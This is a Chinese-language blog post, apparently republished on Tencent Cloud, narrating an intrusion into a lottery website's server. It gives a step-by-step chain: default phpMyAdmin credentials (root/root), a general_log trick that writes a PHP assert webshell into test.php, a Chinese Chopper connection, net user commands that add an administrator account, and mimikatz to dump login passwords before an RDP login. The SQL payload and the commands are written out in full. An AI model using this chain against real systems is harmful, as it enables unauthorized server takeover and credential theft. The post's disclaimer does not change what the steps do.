前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >记一次彩票网站的攻击案例

记一次彩票网站的攻击案例

作者头像
安全小王子
发布2020-11-03 15:23:59
1.4K1
发布2020-11-03 15:23:59
举报
文章被收录于专栏:betasec

声明:请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者及本公众号无关!

START

0x01获取phpmyadmin弱口令

通过信息收集到彩票站点的ip为xxx,探测扫描发现存在phpmyadmin,通过猜测,使用默认弱口令(root/root)登入到phpmyadmin当中。

0x02通过phpmyadmin后台sql查询写入webshell到日志文件

使用phpmyadmin的sql查询功能将一句话木马写入到日志文件当中,流程如下:

命令如下:

1、开启日志功能:set global general_log=on;

2、点击phpmyadmin变量查看日志文件名字:

这里的日志文件是test.php。

3、执行SQL命令写入一句话到日志文件:

代码语言:javascript
复制
SELECT'<?php assert($_POST["test"]);?>';

4、 执行成功返回。

5、 查看日志文件。

0x03菜刀连接添加用户并且上传mimikatz

使用菜刀连接日志文件木马,xxx/test.php 密码:test

查看发现是系统管理员sysytem权限,直接添加用户且添加到管理组即可。

命令为:

代码语言:javascript
复制
C:\Windows\system32\net.exe user Test Test!@#123 /add
C:\Windows\system32\net.exe  localgroup administrators Test /add

上传mimikataz到服务器当中。

0x043389连接,读取管理员密码

1、直接telnet ip 3389 测试发现可通,于是直接连接3389进去。

2、或者这里在菜刀上执行以下命令查询3389开放的端口也一样。

第一步: tasklist /svc | findstr TermService 查询远程桌面服务的进程

第二步: netstat -ano | findstr **** //查看远程桌面服务进程号对应的端口号。

3、执行mimikatz,读取到管理员组登录密码。

4、 使用获取的administrator/xxxx账户密码远程登入服务器当中。

5、发现该服务器使用phpmystudy批量建立彩票站,大概有十几个站点,随意访问几个服务器上的网站域名,部分截图如下:

系统一:

END

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2020-10-25,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 betasec 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档